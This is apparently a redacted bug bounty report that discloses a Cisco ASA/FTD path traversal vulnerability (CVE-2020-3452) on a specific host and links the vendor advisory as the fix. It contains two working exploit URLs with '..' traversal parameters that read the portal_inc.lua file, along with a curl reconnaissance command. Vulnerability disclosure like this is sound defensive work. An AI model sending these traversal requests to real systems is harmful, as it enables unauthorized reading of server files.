i found out that https://█████/ was vulnerable to CVE-2020-3452
The IP has a SSL certificate pointing to ██████████
curl -kv https://███████/
Output;
Server certificate:
███
Impact
Anyone can read any file present on the server.
System Host(s)
█████
Affected Product(s) and Version(s)
CVE Numbers
CVE-2020-3452
Steps to Reproduce
You can test it by visiting the URL:
- https://█████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2BCSCOE%2B/portal_inc.lua
- https://█████/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../
Suggested Mitigation/Remediation Actions
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86